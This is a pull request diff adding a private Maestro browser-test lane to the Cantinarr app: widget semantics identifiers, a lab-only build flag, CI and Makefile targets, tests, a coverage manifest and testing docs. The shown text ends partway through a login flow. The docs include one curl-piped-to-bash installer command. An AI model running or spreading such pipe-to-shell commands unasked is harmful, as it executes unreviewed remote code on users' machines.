### PR TITLE
feat: add private Maestro automation lane

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -9,6 +9,16 @@ concurrency:
   cancel-in-progress: true
 
 jobs:
+  test-catalog:
+    name: Test catalog
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Validate automation traceability
+        run: make check-test-automation
+
   go:
     name: Go
     runs-on: ubuntu-latest

--- a/.gitignore
+++ b/.gitignore
@@ -25,6 +25,10 @@ app/pubspec.lock
 *.swo
 *~
 
+# Python tooling
+__pycache__/
+*.pyc
+
 # macOS
 .DS_Store
 **/.DS_Store

--- a/Dockerfile
+++ b/Dockerfile
@@ -1,10 +1,12 @@
 # Stage 1: Build Flutter web
 FROM --platform=$BUILDPLATFORM ghcr.io/cirruslabs/flutter:stable AS flutter-builder
+ARG CANTINARR_E2E_WEB_SEMANTICS=false
 WORKDIR /app
 COPY app/pubspec.yaml ./
 RUN flutter pub get
 COPY app/ .
-RUN flutter build web --release
+RUN flutter build web --release \
+    --dart-define=CANTINARR_E2E_WEB_SEMANTICS=${CANTINARR_E2E_WEB_SEMANTICS}
 
 # Codex app-server is the supported boundary for ChatGPT subscription auth.
 # Pin and verify the standalone musl binary for reproducible multi-arch images.

--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-.PHONY: all flutter-web copy-web server run clean
+.PHONY: all flutter-web copy-web server run clean check-test-automation test-e2e-tooling maestro-lab-smoke
 
 VERSION ?= $(shell git describe --tags --always --dirty 2>/dev/null || echo dev)
 
@@ -22,3 +22,13 @@ clean:
 	rm -rf server/internal/web/dist/*
 	touch server/internal/web/dist/.gitkeep
 	rm -f server/cantinarr-server
+
+check-test-automation: test-e2e-tooling
+	python3 scripts/check_test_automation.py
+
+test-e2e-tooling:
+	python3 -m unittest discover -s scripts/tests -p 'test_*.py'
+	/bin/bash scripts/tests/maestro-runner-test.sh
+
+maestro-lab-smoke:
+	scripts/run-maestro-lab.sh $(E2E_ARGS)

--- a/README.md
+++ b/README.md
@@ -156,6 +156,12 @@ Optional server env vars for deployment tuning:
 | `CANTINARR_WEBAUTHN_EXTRA_ORIGINS` | unset | Additional WebAuthn origins to trust |
 | `CANTINARR_DISABLE_UPDATE_CHECK` | unset | Set to `1` to disable the periodic GitHub release check behind the admin "update available" banner |
 
+Source image builds also accept the Docker build argument
+`CANTINARR_E2E_WEB_SEMANTICS` (default `false`). It exists only for the
+disposable private lab: setting it to `true` compiles deterministic Maestro
+labels into the Flutter web bundle. Official production images keep the
+default and preserve normal browser accessibility semantics.
+
 OpenAI (OAuth) source deployments use Codex app-server and are supported only on Linux; non-Linux hosts report this provider unavailable even when a Codex binary is installed. The runtime directory's parent must exist, and the directory must be on tmpfs or ramfs—not persistent storage. Give each concurrently running Cantinarr process its own runtime directory; startup removes stale `session-*` entries from that dedicated root. The official container uses its private Docker `/dev/shm` tmpfs. Use the tested Codex 0.144.3 release or a protocol-compatible build.
 
 Native app passkeys require a public HTTPS server domain associated with the app (AASA for Apple, Digital Asset Links for Android). Browser passkey setup remains available when native association isn't possible. See [`server/README.md`](server/README.md#configuration) for details.

--- a/app/lib/core/automation/web_semantics.dart
+++ b/app/lib/core/automation/web_semantics.dart
@@ -1,0 +1,15 @@
+import 'package:flutter/foundation.dart';
+
+const bool e2eWebSemanticsBuildEnabled = bool.fromEnvironment(
+  'CANTINARR_E2E_WEB_SEMANTICS',
+);
+
+bool shouldEnableCurrentWebSemantics() => kIsWeb && e2eWebSemanticsBuildEnabled;
+
+bool _e2eWebSemanticsEnabled = false;
+
+bool get e2eWebSemanticsEnabled => _e2eWebSemanticsEnabled;
+
+void enableE2EWebSemantics() {
+  if (kIsWeb) _e2eWebSemanticsEnabled = true;
+}

--- a/app/lib/core/widgets/media_header.dart
+++ b/app/lib/core/widgets/media_header.dart
@@ -1,5 +1,6 @@
 import 'package:cached_network_image/cached_network_image.dart';
 import 'package:flutter/material.dart';
+import '../automation/web_semantics.dart';
 import '../config/app_config.dart';
 import '../layout/adaptive.dart';
 import '../network/app_image_cache.dart';
@@ -125,26 +126,32 @@ class MediaHeader extends StatelessWidget {
                           crossAxisAlignment: CrossAxisAlignment.start,
                           mainAxisSize: MainAxisSize.min,
                           children: [
-                            Text(
-                              title,
-                              style: Theme.of(context)
-                                  .textTheme
-                                  .displaySmall
-                                  ?.copyWith(
-                                color: AppTheme.textPrimary,
-                                fontSize: expanded ? 42 : 25,
-                                height: 1.05,
-                                fontWeight: FontWeight.w800,
-                                letterSpacing: expanded ? -1.1 : -0.5,
-                                shadows: const [
-                                  Shadow(
-                                    color: Colors.black,
-                                    blurRadius: 16,
-                                  ),
-                                ],
+                            Semantics(
+                              identifier: 'media-detail-title',
+                              label: e2eWebSemanticsEnabled ? title : null,
+                              header: true,
+                              excludeSemantics: e2eWebSemanticsEnabled,
+                              child: Text(
+                                title,
+                                style: Theme.of(context)
+                                    .textTheme
+                                    .displaySmall
+                                    ?.copyWith(
+                                  color: AppTheme.textPrimary,
+                                  fontSize: expanded ? 42 : 25,
+                                  height: 1.05,
+                                  fontWeight: FontWeight.w800,
+                                  letterSpacing: expanded ? -1.1 : -0.5,
+                                  shadows: const [
+                                    Shadow(
+                                      color: Colors.black,
+                                      blurRadius: 16,
+                                    ),
+                                  ],
+                                ),
+                                maxLines: expanded ? 3 : 4,
+                                overflow: TextOverflow.ellipsis,
                               ),
-                              maxLines: expanded ? 3 : 4,
-                              overflow: TextOverflow.ellipsis,
                             ),
                             if (statusText != null) ...[
                               const SizedBox(height: 10),

--- a/app/lib/core/widgets/search_bar.dart
+++ b/app/lib/core/widgets/search_bar.dart
@@ -91,39 +91,42 @@ class CantinarrSearchBar extends StatelessWidget {
                 ),
             ],
           ),
-          child: TextField(
-            controller: controller,
-            focusNode: focusNode,
-            keyboardType: TextInputType.text,
-            onChanged: onChanged,
-            onSubmitted: submitAction == null ? null : (_) => submitAction(),
-            onTapOutside: (_) => focusNode.unfocus(),
-            textInputAction: multiline
-                ? (onSend == null
-                    ? TextInputAction.newline
-                    : TextInputAction.send)
-                : TextInputAction.search,
-            maxLines: maxLines ?? (multiline ? 3 : 1),
-            minLines: multiline ? 2 : 1,
-            style: Theme.of(context).textTheme.bodyLarge?.copyWith(
-                  color: AppTheme.textPrimary,
-                  fontWeight: FontWeight.w500,
-                ),
-            decoration: InputDecoration(
-              hintText: hintText,
-              hintStyle: Theme.of(context).textTheme.bodyLarge?.copyWith(
-                    color: AppTheme.textMuted,
-                    fontWeight: FontWeight.w400,
+          child: Semantics(
+            identifier: 'global-search',
+            child: TextField(
+              controller: controller,
+              focusNode: focusNode,
+              keyboardType: TextInputType.text,
+              onChanged: onChanged,
+              onSubmitted: submitAction == null ? null : (_) => submitAction(),
+              onTapOutside: (_) => focusNode.unfocus(),
+              textInputAction: multiline
+                  ? (onSend == null
+                      ? TextInputAction.newline
+                      : TextInputAction.send)
+                  : TextInputAction.search,
+              maxLines: maxLines ?? (multiline ? 3 : 1),
+              minLines: multiline ? 2 : 1,
+              style: Theme.of(context).textTheme.bodyLarge?.copyWith(
+                    color: AppTheme.textPrimary,
+                    fontWeight: FontWeight.w500,
                   ),
-              prefixIcon: _buildPrefixIcon(focused),
-              suffixIcon: _buildSuffixIcon(),
-              filled: false,
-              border: InputBorder.none,
-              enabledBorder: InputBorder.none,
-              focusedBorder: InputBorder.none,
-              contentPadding: EdgeInsets.symmetric(
-                horizontal: 16,
-                vertical: multiline ? 15 : 16,
+              decoration: InputDecoration(
+                hintText: hintText,
+                hintStyle: Theme.of(context).textTheme.bodyLarge?.copyWith(
+                      color: AppTheme.textMuted,
+                      fontWeight: FontWeight.w400,
+                    ),
+                prefixIcon: _buildPrefixIcon(focused),
+                suffixIcon: _buildSuffixIcon(),
+                filled: false,
+                border: InputBorder.none,
+                enabledBorder: InputBorder.none,
+                focusedBorder: InputBorder.none,
+                contentPadding: EdgeInsets.symmetric(
+                  horizontal: 16,
+                  vertical: multiline ? 15 : 16,
+                ),
               ),
             ),
           ),

--- a/app/lib/features/shell/ui/app_shell.dart
+++ b/app/lib/features/shell/ui/app_shell.dart
@@ -3,6 +3,8 @@ import 'dart:async';
 import 'package:flutter/material.dart';
 import 'package:flutter_riverpod/flutter_riverpod.dart';
 import 'package:go_router/go_router.dart';
+
+import '../../../core/automation/web_semantics.dart';
 import '../../../core/layout/adaptive.dart';
 import '../../../core/models/app_module.dart';
 import '../../../core/models/backend_connection.dart';
@@ -799,6 +801,7 @@ class _AppShellState extends ConsumerState<AppShell>
       final item = _DrawerItem(
         icon: module.icon,
         title: module.label,
+        semanticsIdentifier: 'nav-module-${module.type.name}',
         selected: isActive,
         trailing: selectorInstances.length > 1
             ? _InstanceSelector(
@@ -932,6 +935,7 @@ class _AppShellState extends ConsumerState<AppShell>
               _DrawerItem(
                 icon: Icons.fact_check_outlined,
                 title: 'Approvals',
+                semanticsIdentifier: 'nav-action-approvals',
                 badgeCount: pendingApprovals,
                 onTap: () {
                   if (isOverlay) Navigator.pop(context);
@@ -942,6 +946,7 @@ class _AppShellState extends ConsumerState<AppShell>
               _DrawerItem(
                 icon: Icons.flag_outlined,
                 title: 'Issues',
+                semanticsIdentifier: 'nav-action-issues',
                 badgeCount: openIssues,
                 onTap: () {
                   if (isOverlay) Navigator.pop(context);
@@ -952,6 +957,7 @@ class _AppShellState extends ConsumerState<AppShell>
               _DrawerItem(
                 icon: Icons.build_circle_outlined,
                 title: 'Agent fixes',
+                semanticsIdentifier: 'nav-action-agent-fixes',
                 badgeCount: pendingAgentActions,
                 onTap: () {
                   if (isOverlay) Navigator.pop(context);
@@ -965,6 +971,7 @@ class _AppShellState extends ConsumerState<AppShell>
               _DrawerItem(
                 icon: Icons.play_circle_outline,
                 title: 'Plex invites',
+                semanticsIdentifier: 'nav-action-plex-invites',
                 badgeCount: plexInvitesWaiting,
                 onTap: () {
                   if (isOverlay) Navigator.pop(context);
@@ -977,6 +984,7 @@ class _AppShellState extends ConsumerState<AppShell>
               _DrawerItem(
                 icon: Icons.checklist_outlined,
                 title: 'Setup checklist',
+                semanticsIdentifier: 'nav-action-setup-checklist',
                 badgeCount: setupRemaining,
                 onTap: () {
                   if (isOverlay) Navigator.pop(context);
@@ -1012,6 +1020,7 @@ class _AppShellState extends ConsumerState<AppShell>
             _DrawerItem(
               icon: assistantModule.icon,
               title: assistantModule.label,
+              semanticsIdentifier: 'nav-action-ai-assistant',
               onTap: () {
                 if (isOverlay) Navigator.pop(context);
                 context.push('/assistant');
@@ -1021,6 +1030,7 @@ class _AppShellState extends ConsumerState<AppShell>
             _DrawerItem(
               icon: Icons.play_circle_outline,
               title: 'Watch on Plex',
+              semanticsIdentifier: 'nav-action-watch-on-plex',
               onTap: () {
                 if (isOverlay) Navigator.pop(context);
                 context.push('/plex-guide');
@@ -1029,6 +1039,7 @@ class _AppShellState extends ConsumerState<AppShell>
           _DrawerItem(
             icon: Icons.settings,
             title: 'Settings',
+            semanticsIdentifier: 'nav-action-settings',
             onTap: () {
               if (isOverlay) Navigator.pop(context);
               context.push('/settings');
@@ -1136,6 +1147,7 @@ class _AppShellState extends ConsumerState<AppShell>
 class _DrawerItem extends StatelessWidget {
   final IconData icon;
   final String title;
+  final String semanticsIdentifier;
   final bool selected;
   final VoidCallback onTap;
   final Widget? trailing;
@@ -1146,6 +1158,7 @@ class _DrawerItem extends StatelessWidget {
   const _DrawerItem({
     required this.icon,
     required this.title,
+    required this.semanticsIdentifier,
     this.selected = false,
     required this.onTap,
     this.trailing,
@@ -1174,38 +1187,46 @@ class _DrawerItem extends StatelessWidget {
                 : Colors.transparent,
           ),
         ),
-        child: ListTile(
-          leading: AnimatedContainer(
-            duration: AppTheme.motionFast,
-            width: 34,
-            height: 34,
-            decoration: BoxDecoration(
-              color: selected
-                  ? AppTheme.accent.withValues(alpha: 0.14)
-                  : AppTheme.surfaceVariant.withValues(alpha: 0.7),
-              borderRadius: BorderRadius.circular(AppTheme.radiusMedium),
+        child: Semantics(
+          identifier: semanticsIdentifier,
+          label: e2eWebSemanticsEnabled ? 'Navigate to $title' : null,
+          button: e2eWebSemanticsEnabled,
+          selected: e2eWebSemanticsEnabled ? selected : null,
+          excludeSemantics: e2eWebSemanticsEnabled,
+          onTap: e2eWebSemanticsEnabled ? onTap : null,
+          child: ListTile(
+            leading: AnimatedContainer(
+              duration: AppTheme.motionFast,
+              width: 34,
+              height: 34,
+              decoration: BoxDecoration(
+                color: selected
+                    ? AppTheme.accent.withValues(alpha: 0.14)
+                    : AppTheme.surfaceVariant.withValues(alpha: 0.7),
+                borderRadius: BorderRadius.circular(AppTheme.radiusMedium),
+              ),
+              child: Icon(
+                icon,
+                size: 20,
+                color: selected ? AppTheme.accent : AppTheme.textSecondary,
+              ),
             ),
-            child: Icon(
-              icon,
-              size: 20,
-              color: selected ? AppTheme.accent : AppTheme.textSecondary,
+            title: Text(
+              title,
+              style: TextStyle(
+                color: selected ? AppTheme.textPrimary : AppTheme.textSecondary,
+                fontWeight: selected ? FontWeight.w700 : FontWeight.w500,
+                letterSpacing: selected ? 0.05 : 0,
+              ),
             ),
-          ),
-          title: Text(
-            title,
-            style: TextStyle(
-              color: selected ? AppTheme.textPrimary : AppTheme.textSecondary,
-              fontWeight: selected ? FontWeight.w700 : FontWeight.w500,
-              letterSpacing: selected ? 0.05 : 0,
+            trailing: badgeCount > 0 ? _CountPill(count: badgeCount) : trailing,
+            selected: selected,
+            selectedTileColor: Colors.transparent,
+            shape: RoundedRectangleBorder(
+              borderRadius: BorderRadius.circular(AppTheme.radiusLarge),
             ),
+            onTap: onTap,
           ),
-          trailing: badgeCount > 0 ? _CountPill(count: badgeCount) : trailing,
-          selected: selected,
-          selectedTileColor: Colors.transparent,
-          shape: RoundedRectangleBorder(
-            borderRadius: BorderRadius.circular(AppTheme.radiusLarge),
-          ),
-          onTap: onTap,
         ),
       ),
     );
@@ -1253,30 +1274,38 @@ class _DrawerSubItem extends StatelessWidget {
   Widget build(BuildContext context) {
     return Padding(
       padding: const EdgeInsets.only(left: 20, top: 1, bottom: 1),
-      child: ListTile(
-        dense: true,
-        contentPadding: const EdgeInsets.only(left: 13, right: 12),
-        minLeadingWidth: 0,
-        horizontalTitleGap: 11,
-        leading: Icon(
-          selected ? page.activeIcon : page.icon,
-          size: 18,
-          color: selected ? AppTheme.signal : AppTheme.textMuted,
-        ),
-        title: Text(
-          page.label,
-          style: TextStyle(
-            fontSize: 13,
-            color: selected ? AppTheme.textPrimary : AppTheme.textSecondary,
-            fontWeight: selected ? FontWeight.w700 : FontWeight.w500,
+      child: Semantics(
+        identifier: 'nav-page-${page.route.substring(1).replaceAll('/', '-')}',
+        label: e2eWebSemanticsEnabled ? 'Navigate to ${page.route}' : null,
+        button: e2eWebSemanticsEnabled,
+        selected: e2eWebSemanticsEnabled ? selected : null,
+        excludeSemantics: e2eWebSemanticsEnabled,
+        onTap: e2eWebSemanticsEnabled ? onTap : null,
+        child: ListTile(
+          dense: true,
+          contentPadding: const EdgeInsets.only(left: 13, right: 12),
+          minLeadingWidth: 0,
+          horizontalTitleGap: 11,
+          leading: Icon(
+            selected ? page.activeIcon : page.icon,
+            size: 18,
+            color: selected ? AppTheme.signal : AppTheme.textMuted,
           ),
+          title: Text(
+            page.label,
+            style: TextStyle(
+              fontSize: 13,
+              color: selected ? AppTheme.textPrimary : AppTheme.textSecondary,
+              fontWeight: selected ? FontWeight.w700 : FontWeight.w500,
+            ),
+          ),
+          selected: selected,
+          selectedTileColor: AppTheme.signal.withValues(alpha: 0.075),
+          shape: RoundedRectangleBorder(
+            borderRadius: BorderRadius.circular(AppTheme.radiusMedium),
+          ),
+          onTap: onTap,
         ),
-        selected: selected,
-        selectedTileColor: AppTheme.signal.withValues(alpha: 0.075),
-        shape: RoundedRectangleBorder(
-          borderRadius: BorderRadius.circular(AppTheme.radiusMedium),
-        ),
-        onTap: onTap,
       ),
     );
   }

--- a/app/lib/main.dart
+++ b/app/lib/main.dart
@@ -1,8 +1,20 @@
 import 'package:flutter/material.dart';
 import 'package:flutter_riverpod/flutter_riverpod.dart';
+import 'package:flutter/semantics.dart';
 import 'app.dart';
+import 'core/automation/web_semantics.dart';
 
 void main() {
   WidgetsFlutterBinding.ensureInitialized();
+  final e2eWebSemantics = shouldEnableCurrentWebSemantics();
+  if (e2eWebSemantics) {
+    enableE2EWebSemantics();
+  }
   runApp(const ProviderScope(child: CantinarrApp()));
+  if (e2eWebSemantics) {
+    // Flutter web keeps its semantic DOM off by default for performance. The
+    // explicit E2E opt-in gives accessibility tooling and black-box tests a
+    // stable tree without imposing that cost on normal production sessions.
+    SemanticsBinding.instance.ensureSemantics();
+  }
 }

--- a/app/test/core/widgets/media_header_test.dart
+++ b/app/test/core/widgets/media_header_test.dart
@@ -5,6 +5,7 @@ import 'package:flutter_test/flutter_test.dart';
 void main() {
   testWidgets('media header shows the title without generic eyebrow copy',
       (tester) async {
+    final semantics = tester.ensureSemantics();
     await tester.pumpWidget(
       const MaterialApp(
         home: Scaffold(
@@ -14,6 +15,8 @@ void main() {
     );
 
     expect(find.text('Project Hail Mary'), findsOneWidget);
+    expect(find.bySemanticsIdentifier('media-detail-title'), findsOneWidget);
     expect(find.text('NOW IN FOCUS'), findsNothing);
+    semantics.dispose();
   });
 }

--- a/app/test/core/widgets/search_bar_test.dart
+++ b/app/test/core/widgets/search_bar_test.dart
@@ -3,6 +3,29 @@ import 'package:flutter/material.dart';
 import 'package:flutter_test/flutter_test.dart';
 
 void main() {
+  testWidgets('exposes a stable semantics identifier', (tester) async {
+    final semantics = tester.ensureSemantics();
+    final controller = TextEditingController();
+    final focusNode = FocusNode();
+
+    addTearDown(controller.dispose);
+    addTearDown(focusNode.dispose);
+
+    await tester.pumpWidget(
+      MaterialApp(
+        home: Scaffold(
+          body: CantinarrSearchBar(
+            controller: controller,
+            focusNode: focusNode,
+          ),
+        ),
+      ),
+    );
+
+    expect(find.bySemanticsIdentifier('global-search'), findsOneWidget);
+    semantics.dispose();
+  });
+
   testWidgets('multiline search bar submits on keyboard send action',
       (tester) async {
     final controller = TextEditingController(text: 'Find something good');

--- a/app/test/shell/app_shell_test.dart
+++ b/app/test/shell/app_shell_test.dart
@@ -177,6 +177,7 @@ void main() {
   });
 
   testWidgets('non-admin drawer hides instance app modules', (tester) async {
+    final semantics = tester.ensureSemantics();
     tester.view.physicalSize = const Size(390, 844);
     tester.view.devicePixelRatio = 1;
     addTearDown(() {
@@ -217,10 +218,14 @@ void main() {
     await tester.pumpAndSettle();
 
     expect(find.text('Discover'), findsOneWidget);
+    expect(find.bySemanticsIdentifier('nav-module-dashboard'), findsOneWidget);
+    expect(find.bySemanticsIdentifier('nav-action-settings'), findsOneWidget);
     expect(find.text('Radarr'), findsNothing);
+    expect(find.bySemanticsIdentifier('nav-module-radarr'), findsNothing);
     expect(find.text('Main Radarr'), findsNothing);
     expect(find.text('4K Radarr'), findsNothing);
     expect(find.byTooltip('Choose Radarr instance'), findsNothing);
+    semantics.dispose();
   });
 
   testWidgets('admin drawer selector switches the active app instance',

--- a/app/test/web_semantics_test.dart
+++ b/app/test/web_semantics_test.dart
@@ -1,0 +1,12 @@
+import 'package:cantinarr/core/automation/web_semantics.dart';
+import 'package:flutter/foundation.dart';
+import 'package:flutter_test/flutter_test.dart';
+
+void main() {
+  test('E2E web semantics require both a web target and the build define', () {
+    expect(
+      shouldEnableCurrentWebSemantics(),
+      kIsWeb && e2eWebSemanticsBuildEnabled,
+    );
+  });
+}

--- a/docs/testing/README.md
+++ b/docs/testing/README.md
@@ -2,6 +2,11 @@
 
 This folder is the master list of end-to-end Cantinarr behavior to verify. Cases are grouped by product area, shared setup is listed in [fixtures](fixtures.md), and the [run template](run-template.md) can be copied when recording a test run.
 
+Machine-driven coverage is tracked separately from the reusable checklist. See
+[automation](automation.md) for the layer boundaries, private-lab runner, and
+coverage workflow; [automation.json](automation.json) is the validated mapping
+from catalog IDs to current proof.
+
 ## Test areas
 
 | Area | Case prefixes | Cases |
@@ -22,6 +27,11 @@ This folder is the master list of end-to-end Cantinarr behavior to verify. Cases
 3. Copy the [run template](run-template.md) and record results, notes, and evidence there. Leave the committed checklist unchecked so it stays reusable.
 4. For third-party integrations, verify both Cantinarr's result and the resulting state in Plex, the arr service, download client, push device, or AI provider.
 5. When a case has a vector table, run every applicable row before marking the parent case complete.
+
+Run `make check-test-automation` after adding or changing catalog cases,
+Maestro flows, suites, or automation mappings. Run the current private-lab UI
+smoke suite with `make maestro-lab-smoke`; it never targets a public server or
+a household setup.
 
 Use `PASS` when the expected behavior is observed, `FAIL` when it is not, `BLOCKED` when the test cannot be completed, and `N/A` when the case does not apply to the tested configuration.
 

--- a/docs/testing/automation.json
+++ b/docs/testing/automation.json
@@ -1,0 +1,42 @@
+{
+  "schema_version": 1,
+  "proofs": [
+    {
+      "case_id": "AUTH-007",
+      "status": "automated",
+      "runner": "maestro-web",
+      "specs": [
+        "e2e/maestro/flows/auth/password-login.yaml"
+      ],
+      "scope": "Known-user failure, unknown-user failure, identical non-enumerating copy, and successful password login against the disposable lab."
+    },
+    {
+      "case_id": "AUTH-022",
+      "status": "partial",
+      "runner": "maestro-web",
+      "specs": [
+        "e2e/maestro/flows/authorization/requester-navigation.yaml"
+      ],
+      "scope": "Proves admin module and attention entries are absent for the no-grants requester; direct-route and API authorization remain separate proofs."
+    },
+    {
+      "case_id": "NAV-001",
+      "status": "partial",
+      "runner": "maestro-web",
+      "specs": [
+        "e2e/maestro/flows/navigation/admin-modules.yaml"
+      ],
+      "scope": "Proves the fixed admin sees the complete configured module inventory; route entry, page navigation, breakpoints, back behavior, and preserved-stack coverage remain."
+    },
+    {
+      "case_id": "NAV-003",
+      "status": "partial",
+      "runner": "maestro-web",
+      "specs": [
+        "e2e/maestro/flows/navigation/admin-modules.yaml",
+        "e2e/maestro/flows/authorization/requester-navigation.yaml"
+      ],
+      "scope": "Compares fixed lab admin and requester navigation for configured services; conditional attention-state permutations remain."
+    }
+  ]
+}

--- a/docs/testing/automation.md
+++ b/docs/testing/automation.md
@@ -1,0 +1,135 @@
+# Test automation
+
+Cantinarr has 584 parent cases, not 584 equivalent UI scripts. The explicit
+Plex vectors plus required download-client and MCP mode matrices raise the
+conservative minimum to 802 executions before prose variants are expanded.
+Automation therefore follows the cheapest layer that can prove each behavior,
+while the catalog ID remains the stable traceability key.
+
+## Layer ownership
+
+| Layer | Primary responsibility |
+|---|---|
+| Go unit/API/integration | Contracts, authorization matrices, sanitization, concurrency, idempotency, cache behavior, protocol vectors, and most controlled failures |
+| Flutter unit/widget | State matrices, validation, labels, loading/error/empty states, layouts, and provider behavior |
+| Maestro | A thin set of black-box web journeys across authentication and role-specific navigation against the disposable lab; add other surfaces only when the web driver can prove them reliably |
+| Patrol | Native-only boundaries that benefit from Dart assertions: passkeys, notification permissions/taps, deep links, external browser/WebView handoff, app lifecycle, and network controls |
+| Manual/external | Physical-device delivery, real Plex share truth, store submission, cross-browser/accessibility audits, low-end performance, and exploratory sessions |
+
+Maestro is the first black-box browser lane because it can drive the actual
+same-origin web app served by the lab without changing application dependencies.
+Patrol should be introduced with the first native boundary case, not as a
+second copy of the Maestro suite. A UI success message is never sufficient for
+a case that also requires API, upstream, filesystem, or realtime proof.
+
+## Current Maestro smoke suite
+
+The initial web suite proves one complete parent (`AUTH-007`) and records
+honest partial coverage for `AUTH-022`, `NAV-001`, and `NAV-003`. It runs three
+isolated flows as the lab's second admin and no-grants requester. Search is not
+claimed: Maestro web can focus Flutter's fixed search field but does not
+reliably inject text into its hidden editing element, so that attempted pilot
+was removed instead of turning a red flow into nominal coverage.
+
+The suite deliberately runs locally, not on Maestro Cloud. The DigitalOcean
+firewall remains SSH-only from the operator's exact address, and the lab-owned
+wrapper opens one temporary `127.0.0.1` tunnel. Each suite chooses a fresh
+loopback origin so Chromium cannot mask a newly deployed candidate with an
+older Flutter service-worker/cache entry. Generated passwords are read
+from the lab's ignored mode-0600 environment file, passed only in
+`MAESTRO_*` process environment, scrubbed from streaming console output and
+completed-run artifacts, and never placed in command arguments or committed
+files. Exit and signal traps make a best-effort scrub (or remove the run
+directory) if local execution is interrupted; `SIGKILL` cannot run cleanup.
+Locally built lab candidates also set the Docker build argument
+`CANTINARR_E2E_WEB_SEMANTICS=true`. Production images default it to `false`;
+the build-time seam keeps E2E-only flattened labels out of ordinary browser
+accessibility while making lab selectors deterministic.
+
+Prerequisites:
+
+- the private `cantinarr-lab` checkout next to `src/`, with a provisioned lab;
+- Java 17 or 21;
+- Maestro CLI exactly 2.6.1 (the version proved by this harness); and
+- the normal lab tools and SSH identity described by the lab operator guide.
+
+The official installer supports an exact version:
+
+```sh
+brew install openjdk@21
+export MAESTRO_VERSION=2.6.1
+curl -Ls https://get.maestro.mobile.dev | bash
+```
+
+Run the already-deployed candidate:
+
+```sh
+make maestro-lab-smoke
+```
+
+Build and deploy the current Cantinarr checkout first, then test it:
+
+```sh
+E2E_ARGS=--deploy make maestro-lab-smoke
+```
+
+Start from a fully reset lab state when a stateful suite requires it:
+
+```sh
+E2E_ARGS="--deploy --reset" make maestro-lab-smoke
+```
+
+`--reset` is intentionally opt-in because it deletes and reseeds every lab
+Docker volume. It does not destroy or broaden the Droplet. `make destroy` in
+the private lab repo remains the billable-resource teardown.
+
+Maestro writes JUnit, logs, and failure screenshots under the ignored
+`e2e/maestro/.artifacts/` tree. The runner uses a restrictive umask and
+redacts the selected password before reporting the artifact path.
+
+## Traceability and conversion workflow
+
+`automation.json` records `automated` and `partial` proof without copying the
+catalog description. `e2e/maestro/suites.json` maps each executable flow to
+one of the five fixed lab identities. `scripts/check_test_automation.py`
+validates all catalog counts and IDs, proof paths, the flow command allowlist,
+repository-helper containment, password-input restrictions, suite membership,
+and the rule that a fully automated parent carries the `AUTO` tag.
+
+When converting a case:
+
+1. Split its assertions by proof surface; do not force API or chaos assertions through UI taps.
+2. Add the lower-level proof first where applicable, then one Maestro journey only if visible integration behavior remains.
+3. Put every catalog ID in the test/flow name or comment and add a scoped mapping in `automation.json`.
+4. Use `partial` until every clause and required vector has proof; add `AUTO` only when the parent is complete.
+5. Run `make check-test-automation`, the relevant normal tests, and the live lab suite when its environment is required.
+
+PR CI validates the catalog, manifest, and flow wiring but does not receive
+DigitalOcean, SSH, or lab credentials. Live lab execution belongs on the
+operator workstation today. A future scheduled/manual job must use a protected
+self-hosted runner or equivalent private access design; never use
+`pull_request_target` to execute arbitrary PR code with lab credentials.
+
+## Selector policy and Patrol boundary
+
+The pilot pairs stable `Semantics.identifier` values with deterministic,
+lab-build-only labels for navigation and media detail, plus unique accessible
+labels for auth fields. The lab build seam enables the specialized labels
+before `runApp` and explicitly turns on Flutter's semantic DOM afterward; flows
+target only the wrapper-supplied loopback origin. Maestro's current web
+hierarchy omits Flutter's fixed desktop shell
+chrome, so navigation flows use a 500×1400 outer window, open the drawer as an
+active semantic route, and render its complete inventory to prevent off-screen
+false negatives.
+Ordinary production browser sessions keep Flutter's default lazy semantic DOM
+and native widget semantics. Before a surface accumulates many flows,
+add stable identifiers for request actions, dialogs, tabs, instance selectors,
+and destructive confirmations. Flutter `Key`/`ValueKey` values are not visible
+to Maestro and are not E2E selectors.
+
+Patrol should start with the smallest native suite that proves platform state
+Maestro web cannot: native passkeys, APNs permission and notification taps,
+`cantinarr://` deep links, external OAuth/browser handoff, secure-session
+restore, and background/foreground behavior. Real APNs, passkeys, Plex, and
+store cases still require reviewed disposable accounts or dedicated hardware;
+the driver does not remove that dependency.

--- a/docs/testing/catalog/auth-users-security.md
+++ b/docs/testing/catalog/auth-users-security.md
@@ -12,7 +12,7 @@ Use the [run template](../run-template.md) to record executions of these cases.
 - [ ] `AUTH-004` · P0 · UI — Issue another connect/device link for an existing username; verify it attaches a new device to the same user rather than creating a duplicate.
 - [ ] `AUTH-005` · P0 · UI — Let a connect link expire, then issue a fresh one; verify the expired link fails clearly and the new link succeeds.
 - [ ] `AUTH-006` · P0 · SEC — Try an external, scheme-relative, and malformed return target through login/connect; verify navigation only returns to an app-internal path.
-- [ ] `AUTH-007` · P0 · UI — Log in with an enabled password using correct and incorrect credentials; verify only the correct password creates a session and errors do not reveal whether another username exists.
+- [ ] `AUTH-007` · P0 · AUTO/UI — Log in with an enabled password using correct and incorrect credentials; verify only the correct password creates a session and errors do not reveal whether another username exists.
 - [ ] `AUTH-008` · P0 · API — Exceed the public login/setup/connect/passkey rate limit from one IP; verify throttling after the documented allowance and recovery after the window.
 - [ ] `AUTH-009` · P0 · UI — Enable password for a user, let them set it, then disable password; verify subsequent password login fails and existing device sessions follow the documented device policy.
 - [ ] `AUTH-010` · P0 · SEC — Attempt to set a password for a user whose admin toggle is off; verify both UI and direct API reject it.

--- a/e2e/maestro/.gitignore
+++ b/e2e/maestro/.gitignore
@@ -1,0 +1,1 @@
+.artifacts/

--- a/e2e/maestro/config.yaml
+++ b/e2e/maestro/config.yaml
@@ -1,0 +1,5 @@
+flows:
+  - "flows/**/*.yaml"
+executionOrder:
+  continueOnFailure: false
+testOutputDir: .artifacts

--- a/e2e/maestro/flows/auth/password-login.yaml
+++ b/e2e/maestro/flows/auth/password-login.yaml
@@ -1,0 +1,64 @@
+url: ${MAESTRO_SERVER_URL}
+name: AUTH-007 password login
+tags:
+  - smoke
+  - lab
+  - auth
+---
+# AUTH-007
+- launchApp
+- extendedWaitUntil:
+    visible: "Sign in to your server"
+    timeout: 15000
+
+# A known account and an unknown account must get the same non-enumerating
+# failure copy. Keep the deliberately wrong value static and non-secret.
+- tapOn:
+    id: "Username"
+- inputText: ${MAESTRO_USERNAME}
+- tapOn:
